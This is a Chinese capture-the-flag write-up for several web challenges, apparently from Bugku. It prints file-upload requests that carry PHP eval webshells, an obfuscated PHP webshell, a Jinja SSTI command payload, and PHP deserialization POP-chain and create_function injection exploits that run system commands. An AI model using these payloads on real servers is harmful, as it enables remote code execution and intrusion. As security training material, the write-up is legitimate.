1 2 3 key.*key.{4,7}key:\/.*\/(.*key)[a-z][[:punct:]] http://114.67.175.224:15541/?id=keyaaakeyaaaaakey:/a/akeya,
Flask_FileUpload Python的文件上传
1 2 import os os.system('tac /flag')
写成png就可以了
xxx二手交易市场 这里还是打一个上传文件,注册登录之后上传头像,发现是进行了base64解密的并且这里使用的是data协议来上传,
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 POST /user/upload HTTP/1.1 Host : 114.67.175.224:10308Content-Length : 64X-Requested-With : XMLHttpRequestUser-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36Accept : application/json, text/javascript, */*; q=0.01Content-Type : application/x-www-form-urlencoded; charset=UTF-8Origin : http://114.67.175.224:10308Referer : http://114.67.175.224:10308/UserAccept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; _ga=GA1.1.1320821268.1731844587; _gid=GA1.1.1851908107.1731844587; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; PHPSESSID=uukfhesjl5h1t0mvdch88ome03; flag=flag%7B67e7bb4eb5eee5456d01992aeb60ac21%7DConnection : closeimage =data:image/php
文件上传 一直测去吧,后面发现可以混淆后缀
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 POST /index.php HTTP/1.1 Host : 114.67.175.224:12453Content-Length : 302Cache-Control : max-age=0Origin : http://114.67.175.224:12453Content-Type : Multipart/form-data; boundary=----WebKitFormBoundaryWYvSV2LGFvAww1ePUpgrade-Insecure-Requests : 1User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer : http://114.67.175.224:12453/Accept-Encoding : gzip, deflateAccept-Language : zh-CN,zh;q=0.9,en;q=0.8Cookie : Hm_lvt_c1b044f909411ac4213045f0478e96fc=1731844587; _ga=GA1.1.1320821268.1731844587; _gid=GA1.1.1851908107.1731844587; _ga_F3VRZT58SJ=GS1.1.1731844587.1.1.1731844789.0.0.0; PHPSESSID=uukfhesjl5h1t0mvdch88ome03; flag=flag%7B67e7bb4eb5eee5456d01992aeb60ac21%7DConnection : close------WebKitFormBoundaryWYvSV2LGFvAww1eP Content-Disposition: form-data; name="file" ; filename="1.php4" Content-Type: image/png <?php eval ($_POST [a]);?> ------WebKitFormBoundaryWYvSV2LGFvAww1eP Content-Disposition: form-data; name="submit" Submit ------WebKitFormBoundaryWYvSV2LGFvAww1eP--
主要就是这个细节
Multipart/form-data :
表示请求体是以多部分形式编码的。这种编码方式通常用于表单上传文件或包含文件和其他字段的复杂数据。
getshell 1 2 3 4 5 6 7 8 9 <?php define ('pfkzYUelxEGmVcdDNLTjXCSIgMBKOuHAFyRtaboqwJiQWvsZrPhn' , __FILE__ );$cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ = urldecode ("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A" );$BwltqOYbHaQkRPNoxcfnFmzsIjhdMDAWUeKGgviVrJZpLuXETSyC = $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ {3 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ {6 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ {33 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ {30 };$hYXlTgBqWApObxJvejPRSdHGQnauDisfENIFyocrkULwmKMCtVzZ = $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ {33 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ {10 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ {24 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ {10 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ {24 };$vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV = $hYXlTgBqWApObxJvejPRSdHGQnauDisfENIFyocrkULwmKMCtVzZ {0 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ {18 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ {3 } . $hYXlTgBqWApObxJvejPRSdHGQnauDisfENIFyocrkULwmKMCtVzZ {0 } . $hYXlTgBqWApObxJvejPRSdHGQnauDisfENIFyocrkULwmKMCtVzZ {1 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ {24 };$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR = $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ {7 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ {13 };$BwltqOYbHaQkRPNoxcfnFmzsIjhdMDAWUeKGgviVrJZpLuXETSyC .= $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ {22 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ {36 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ {29 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ {26 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ {30 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ {32 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ {35 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ {26 } . $cPIHjUYxDZVBvOTsuiEClpMXAfSqrdegyFtbnGzRhWNJKwLmaokQ {30 };eval ($BwltqOYbHaQkRPNoxcfnFmzsIjhdMDAWUeKGgviVrJZpLuXETSyC ("$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";eval('?>'.$BwltqOYbHaQkRPNoxcfnFmzsIjhdMDAWUeKGgviVrJZpLuXETSyC($hYXlTgBqWApObxJvejPRSdHGQnauDisfENIFyocrkULwmKMCtVzZ($vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV($NviuywCePWEGlacAmfjrgBMTYXzHZpIxDqQnsUKkhotFSORdVJLb,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR*2),$vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV($NviuywCePWEGlacAmfjrgBMTYXzHZpIxDqQnsUKkhotFSORdVJLb,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR),$vNwTOsKPEAlLciJDBhWtRSHXempIrjyQUuGoaknYCdFzqZMxfbgV($NviuywCePWEGlacAmfjrgBMTYXzHZpIxDqQnsUKkhotFSORdVJLb,0,$ciMfTXpPoJHzZBxLOvngjQCbdIGkYlVNSumFrAUeWasKyEtwhDqR))));" )); ?>
这玩意,估计是要分解然后不知道咋整了
1 2 3 4 <?php highlight_file (__FILE__ );@eval ($_POST [ymlisisisiook]); ?>
链接之后发现不能动,这一看就是绕过disable_function
,但是这里我的文件好像是被删除了,所以我重新下载了一下(挂代理,不然卡死你)
密码还是之前那个,链接就好了
点login咋没反应 查看源代码拿到源码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 <?php error_reporting (0 );$KEY ='ctf.bugku.com' ;include_once ("flag.php" );$cookie = $_COOKIE ['BUGKU' ];if (isset ($_GET ['16584' ])){ show_source (__FILE__ ); } elseif (unserialize ($cookie ) === "$KEY " ){ echo "$flag " ; } else {?> <?php } ?>
1 2 3 <?php $payload ="ctf.bugku.com" ;echo serialize ($payload );
Simple_SSTI_1 1 http://114.67.175.224:12287/?flag={{g.pop.__globals__.__builtins__['__import__']('os').popen('env').read()}}
兔年大吉2 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 <?php highlight_file (__FILE__ );error_reporting (0 );class Happy { private $cmd ; private $content ; public function __construct ($cmd , $content ) { $this ->cmd = $cmd ; $this ->content = $content ; } public function __call ($name , $arguments ) { call_user_func ($this ->cmd, $this ->content); } public function __wakeup ( ) { die ("Wishes can be fulfilled" ); } } class Nevv { private $happiness ; public function __invoke ( ) { return $this ->happiness->check (); } } class Rabbit { private $aspiration ; public function __set ($name ,$val ) { return $this ->aspiration->family; } } class Year { public $key ; public $rabbit ; public function __construct ($key ) { $this ->key = $key ; } public function firecrackers ( ) { return $this ->rabbit->wish = "allkill QAQ" ; } public function __get ($name ) { $name = $this ->rabbit; $name (); } public function __destruct ( ) { if ($this ->key == "happy new year" ) { $this ->firecrackers (); }else { print ("Welcome 2023!!!!!" ); } } } if (isset ($_GET ['pop' ])) { $a = unserialize ($_GET ['pop' ]); }else { echo "过新年啊~过个吉祥年~" ; } ?> 过新年啊~过个吉祥年~
终于来了pop链
1 Year::destruct->Year::firecrackers->Rabbit::set->Year::get->Nevv::invoke->Happy::call->getshell
写exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 <?php class Happy { public $cmd ; public $content ; } class Nevv { public $happiness ; } class Rabbit { public $aspiration ; } class Year { public $key ; public $rabbit ; } $a =new Year ();$a ->key="happy new year" ;$a ->rabbit=new Rabbit ();$a ->rabbit->aspiration=new Year ();$a ->rabbit->aspiration->rabbit=new Nevv ();$a ->rabbit->aspiration->rabbit->happiness=new Happy ();$a ->rabbit->aspiration->rabbit->happiness->cmd="system" ;$a ->rabbit->aspiration->rabbit->happiness->content="whoami" ;echo serialize ($a );
但是这样子肯定打不通,因为是private
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 <?php class Happy { private $cmd ; private $content ; public function __construct ($cmd , $content ) { $this ->cmd = $cmd ; $this ->content = $content ; } } class Nevv { private $happiness ; public function __construct ($happiness ) { $this ->happiness = $happiness ; } } class Rabbit { private $aspiration ; public function __construct ($aspiration ) { $this ->aspiration = $aspiration ; } } class Year { public $key ="happy new year" ; public $rabbit ; } $b =new Year ();$c =new Rabbit ($b );$e =new Happy ("system" ,"tac /flag" );$d =new Nevv ($e );$a =new Year ();$a ->rabbit=$c ;$b ->rabbit=$d ;echo urlencode (serialize ($a ));
这样子就可以了,还是第一次写这种,之前我都是用replace正向替换的
unserialize-Noteasy 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 <?php if (isset ($_GET ['p' ])) { $p = unserialize ($_GET ['p' ]); } show_source ("index.php" );class Noteasy { private $a ; private $b ; public function __construct ($a , $b ) { $this ->a = $a ; $this ->b = $b ; $this ->check ($a .$b ); eval ($a .$b ); } public function __destruct ( ) { $a = (string )$this ->a; $b = (string )$this ->b; $this ->check ($a .$b ); $a ("" , $b ); } private function check ($str ) { if (preg_match_all ("(ls|find|cat|grep|head|tail|echo)" , $str ) > 0 ) die ("You are a hacker, get out" ); } public function setAB ($a , $b ) { $this ->a = $a ; $this ->b = $b ; } }
这看着就像是create_function注入
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 <?php class Noteasy { private $a ; private $b ; public function __construct ($a , $b ) { $this ->a = $a ; $this ->b = $b ; } } $a =new Noteasy ("create_function" ,";}system('tac flag');/*" );echo urlencode (serialize ($a ));
